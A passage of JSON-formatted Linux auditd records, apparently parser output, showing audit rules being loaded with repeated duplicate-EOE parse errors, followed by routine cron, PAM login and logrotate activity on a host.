"input": "node=null type=EOE msg=audit(1632470378.147:263): \n"
}
}
{
"ID": "1632470378.147:264",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.147:264",
"input": "node=null type=EOE msg=audit(1632470378.147:264): \n"
}
}
{
"ID": "1632470378.147:265",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.147:265",
"input": "node=null type=EOE msg=audit(1632470378.147:265): \n"
}
}
{
"ID": "1632470378.147:266",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.147:266",
"input": "node=null type=EOE msg=audit(1632470378.147:266): \n"
}
}
{
"ID": "1632470378.151:267",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:267",
"input": "node=null type=EOE msg=audit(1632470378.151:267): \n"
}
}
{
"ID": "1632470378.151:268",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:268",
"input": "node=null type=EOE msg=audit(1632470378.151:268): \n"
}
}
{
"ID": "1632470378.151:269",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:269",
"input": "node=null type=EOE msg=audit(1632470378.151:269): \n"
}
}
{
"ID": "1632470378.151:270",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:270",
"input": "node=null type=EOE msg=audit(1632470378.151:270): \n"
}
}
{
"ID": "1632470378.151:271",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "code_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:271",
"input": "node=null type=EOE msg=audit(1632470378.151:271): \n"
}
}
{
"ID": "1632470378.151:272",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "code_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.151:272",
"input": "node=null type=EOE msg=audit(1632470378.151:272): \n"
}
}
{
"ID": "1632470378.155:273",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "data_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:273",
"input": "node=null type=EOE msg=audit(1632470378.155:273): \n"
}
}
{
"ID": "1632470378.155:274",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "data_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:274",
"input": "node=null type=EOE msg=audit(1632470378.155:274): \n"
}
}
{
"ID": "1632470378.155:275",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "register_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:275",
"input": "node=null type=EOE msg=audit(1632470378.155:275): \n"
}
}
{
"ID": "1632470378.155:276",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "register_injection",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:276",
"input": "node=null type=EOE msg=audit(1632470378.155:276): \n"
}
}
{
"ID": "1632470378.155:277",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "tracing",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:277",
"input": "node=null type=EOE msg=audit(1632470378.155:277): \n"
}
}
{
"ID": "1632470378.155:278",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "tracing",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:278",
"input": "node=null type=EOE msg=audit(1632470378.155:278): \n"
}
}
{
"ID": "1632470378.155:279",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "power_abuse",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.155:279",
"input": "node=null type=EOE msg=audit(1632470378.155:279): \n"
}
}
{
"ID": "1632470378.159:280",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:280",
"input": "node=null type=EOE msg=audit(1632470378.159:280): \n"
}
}
{
"ID": "1632470378.159:281",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:281",
"input": "node=null type=EOE msg=audit(1632470378.159:281): \n"
}
}
{
"ID": "1632470378.159:282",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:282",
"input": "node=null type=EOE msg=audit(1632470378.159:282): \n"
}
}
{
"ID": "1632470378.159:283",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:283",
"input": "node=null type=EOE msg=audit(1632470378.159:283): \n"
}
}
{
"ID": "1632470378.159:284",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:284",
"input": "node=null type=EOE msg=audit(1632470378.159:284): \n"
}
}
{
"ID": "1632470378.159:285",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.159:285",
"input": "node=null type=EOE msg=audit(1632470378.159:285): \n"
}
}
{
"ID": "1632470378.163:286",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.163:286",
"input": "node=null type=EOE msg=audit(1632470378.163:286): \n"
}
}
{
"ID": "1632470378.163:287",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.163:287",
"input": "node=null type=EOE msg=audit(1632470378.163:287): \n"
}
}
{
"ID": "1632470378.163:288",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.163:288",
"input": "node=null type=EOE msg=audit(1632470378.163:288): \n"
}
}
{
"ID": "1632470378.163:289",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.163:289",
"input": "node=null type=EOE msg=audit(1632470378.163:289): \n"
}
}
{
"ID": "1632470378.167:290",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:290",
"input": "node=null type=EOE msg=audit(1632470378.167:290): \n"
}
}
{
"ID": "1632470378.167:291",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:291",
"input": "node=null type=EOE msg=audit(1632470378.167:291): \n"
}
}
{
"ID": "1632470378.167:292",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:292",
"input": "node=null type=EOE msg=audit(1632470378.167:292): \n"
}
}
{
"ID": "1632470378.167:293",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:293",
"input": "node=null type=EOE msg=audit(1632470378.167:293): \n"
}
}
{
"ID": "1632470378.167:294",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:294",
"input": "node=null type=EOE msg=audit(1632470378.167:294): \n"
}
}
{
"ID": "1632470378.167:295",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "software_mgmt",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.167:295",
"input": "node=null type=EOE msg=audit(1632470378.167:295): \n"
}
}
{
"ID": "1632470378.171:296",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "puppet_ssl",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.171:296",
"input": "node=null type=EOE msg=audit(1632470378.171:296): \n"
}
}
{
"ID": "1632470378.171:297",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "soft_besclient",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.171:297",
"input": "node=null type=EOE msg=audit(1632470378.171:297): \n"
}
}
{
"ID": "1632470378.171:298",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "soft_besclient",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.171:298",
"input": "node=null type=EOE msg=audit(1632470378.171:298): \n"
}
}
{
"ID": "1632470378.171:299",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "soft_chef",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.171:299",
"input": "node=null type=EOE msg=audit(1632470378.171:299): \n"
}
}
{
"ID": "1632470378.171:300",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.171:300",
"input": "node=null type=EOE msg=audit(1632470378.171:300): \n"
}
}
{
"ID": "1632470378.175:301",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.175:301",
"input": "node=null type=EOE msg=audit(1632470378.175:301): \n"
}
}
{
"ID": "1632470378.175:302",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.175:302",
"input": "node=null type=EOE msg=audit(1632470378.175:302): \n"
}
}
{
"ID": "1632470378.175:303",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.175:303",
"input": "node=null type=EOE msg=audit(1632470378.175:303): \n"
}
}
{
"ID": "1632470378.175:304",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.175:304",
"input": "node=null type=EOE msg=audit(1632470378.175:304): \n"
}
}
{
"ID": "1632470378.179:305",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.179:305",
"input": "node=null type=EOE msg=audit(1632470378.179:305): \n"
}
}
{
"ID": "1632470378.179:306",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.179:306",
"input": "node=null type=EOE msg=audit(1632470378.179:306): \n"
}
}
{
"ID": "1632470378.179:307",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.179:307",
"input": "node=null type=EOE msg=audit(1632470378.179:307): \n"
}
}
{
"ID": "1632470378.179:308",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "docker",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.179:308",
"input": "node=null type=EOE msg=audit(1632470378.179:308): \n"
}
}
{
"ID": "1632470378.179:309",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "kubelet",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.179:309",
"input": "node=null type=EOE msg=audit(1632470378.179:309): \n"
}
}
{
"ID": "1632470378.183:310",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "rootcmd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:310",
"input": "node=null type=EOE msg=audit(1632470378.183:310): \n"
}
}
{
"ID": "1632470378.183:311",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "rootcmd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:311",
"input": "node=null type=EOE msg=audit(1632470378.183:311): \n"
}
}
{
"ID": "1632470378.183:312",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "delete",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:312",
"input": "node=null type=EOE msg=audit(1632470378.183:312): \n"
}
}
{
"ID": "1632470378.183:313",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "delete",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:313",
"input": "node=null type=EOE msg=audit(1632470378.183:313): \n"
}
}
{
"ID": "1632470378.183:314",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_access",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:314",
"input": "node=null type=EOE msg=audit(1632470378.183:314): \n"
}
}
{
"ID": "1632470378.183:315",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_access",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.183:315",
"input": "node=null type=EOE msg=audit(1632470378.183:315): \n"
}
}
{
"ID": "1632470378.187:316",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_access",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:316",
"input": "node=null type=EOE msg=audit(1632470378.187:316): \n"
}
}
{
"ID": "1632470378.187:317",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_access",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:317",
"input": "node=null type=EOE msg=audit(1632470378.187:317): \n"
}
}
{
"ID": "1632470378.187:318",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_creation",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:318",
"input": "node=null type=EOE msg=audit(1632470378.187:318): \n"
}
}
{
"ID": "1632470378.187:319",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_creation",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:319",
"input": "node=null type=EOE msg=audit(1632470378.187:319): \n"
}
}
{
"ID": "1632470378.187:320",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_creation",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:320",
"input": "node=null type=EOE msg=audit(1632470378.187:320): \n"
}
}
{
"ID": "1632470378.187:321",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_creation",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:321",
"input": "node=null type=EOE msg=audit(1632470378.187:321): \n"
}
}
{
"ID": "1632470378.187:322",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:322",
"input": "node=null type=EOE msg=audit(1632470378.187:322): \n"
}
}
{
"ID": "1632470378.187:323",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.187:323",
"input": "node=null type=EOE msg=audit(1632470378.187:323): \n"
}
}
{
"ID": "1632470378.191:324",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.191:324",
"input": "node=null type=EOE msg=audit(1632470378.191:324): \n"
}
}
{
"ID": "1632470378.191:325",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "file_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.191:325",
"input": "node=null type=EOE msg=audit(1632470378.191:325): \n"
}
}
{
"ID": "1632470378.191:326",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "32bit_api",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.191:326",
"input": "node=null type=EOE msg=audit(1632470378.191:326): \n"
}
}
{
"ID": "1632470378.191:327",
"SERVICE_START": {
"pid": 1,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success"
}
}
{
"ID": "1632470401.462:328",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 257,
"success": "yes",
"exit": 7,
"items": 1,
"ppid": 620,
"pid": 7527,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "cron",
"exe": "/usr/sbin/cron",
"key": "etcpasswd",
"ARGV": [
"0xffffff9c",
"0x7f1e786691a1",
"0x80000",
"0x0"
]
},
"CWD": {
"cwd": "/var/spool/cron"
},
"PATH": [
{
"item": 0,
"name": "/etc/shadow",
"inode": 133340,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 42,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/sbin/CRON",
"-f"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/sbin/cron",
"-f"
],
"launch_time": 1632468155.213,
"ppid": 1
}
}
{
"ID": "1632470401.462:329",
"USER_ACCT": {
"pid": 7527,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "op=PAM:accounting grantors=pam_permit acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.462:330",
"CRED_ACQ": {
"pid": 7527,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "op=PAM:setcred grantors=pam_permit,pam_cap acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.462:331",
"LOGIN": {
"pid": 7527,
"uid": 0,
"old-auid": 4294967295,
"auid": 0,
"tty": "(none)",
"old-ses": 4294967295,
"ses": 6,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470401.462:331",
"input": "node=null type=EOE msg=audit(1632470401.462:331): \n"
}
}
{
"ID": "1632470401.466:332",
"USER_START": {
"pid": 7527,
"uid": 0,
"auid": 0,
"ses": 6,
"msg": "op=PAM:session_open grantors=pam_loginuid,pam_env,pam_env,pam_permit,pam_umask,pam_unix,pam_limits acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.466:333",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 257,
"success": "yes",
"exit": 7,
"items": 1,
"ppid": 620,
"pid": 7528,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "cron",
"exe": "/usr/sbin/cron",
"key": "etcpasswd",
"ARGV": [
"0xffffff9c",
"0x7f1e786691a1",
"0x80000",
"0x0"
]
},
"CWD": {
"cwd": "/var/spool/cron"
},
"PATH": [
{
"item": 0,
"name": "/etc/shadow",
"inode": 133340,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 42,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/sbin/CRON",
"-f"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/sbin/cron",
"-f"
],
"launch_time": 1632468155.213,
"ppid": 1
}
}
{
"ID": "1632470401.466:334",
"USER_ACCT": {
"pid": 7528,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "op=PAM:accounting grantors=pam_permit acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.466:335",
"CRED_ACQ": {
"pid": 7528,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "op=PAM:setcred grantors=pam_permit,pam_cap acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.466:336",
"LOGIN": {
"pid": 7528,
"uid": 0,
"old-auid": 4294967295,
"auid": 0,
"tty": "(none)",
"old-ses": 4294967295,
"ses": 7,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470401.466:336",
"input": "node=null type=EOE msg=audit(1632470401.466:336): \n"
}
}
{
"ID": "1632470401.470:337",
"USER_START": {
"pid": 7528,
"uid": 0,
"auid": 0,
"ses": 7,
"msg": "op=PAM:session_open grantors=pam_loginuid,pam_env,pam_env,pam_permit,pam_umask,pam_unix,pam_limits acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.470:338",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7527,
"pid": 7529,
"auid": 0,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 6,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x55f9d608d776",
"0x7ffd18945820",
"0x55f9d60994c0",
"0x7ffd18945820"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/scxagent --state /var/opt/microsoft/scx/log/scx-logrotate.status >/dev/null 2>&1"
]
},
"CWD": {
"cwd": "/root"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/scxagent --state /var/opt/microsoft/scx/log/scx-logrotate.status >/dev/null 2>&1"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/sbin/CRON",
"-f"
],
"launch_time": 1632470401.453,
"ppid": 620
}
}
{
"ID": "1632470401.470:339",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7528,
"pid": 7530,
"auid": 0,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 7,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x55f9d608d756",
"0x7ffd18945820",
"0x55f9d6099640",
"0x7ffd18945820"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/omi --state /var/opt/omi/log/omi-logrotate.status >/dev/null 2>&1"
]
},
"CWD": {
"cwd": "/root"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/omi --state /var/opt/omi/log/omi-logrotate.status >/dev/null 2>&1"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/sbin/CRON",
"-f"
],
"launch_time": 1632470401.453,
"ppid": 620
}
}
{
"ID": "1632470401.474:340",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7529,
"pid": 7531,
"auid": 0,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 6,
"comm": "logrotate",
"exe": "/usr/sbin/logrotate",
"key": "rootcmd",
"ARGV": [
"0x563d9e0354a8",
"0x563d9e035560",
"0x563d9e0355a8",
"0x7f68e1e52850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"/usr/sbin/logrotate",
"/etc/logrotate.d/scxagent",
"--state",
"/var/opt/microsoft/scx/log/scx-logrotate.status"
]
},
"CWD": {
"cwd": "/root"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/logrotate",
"inode": 794142,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
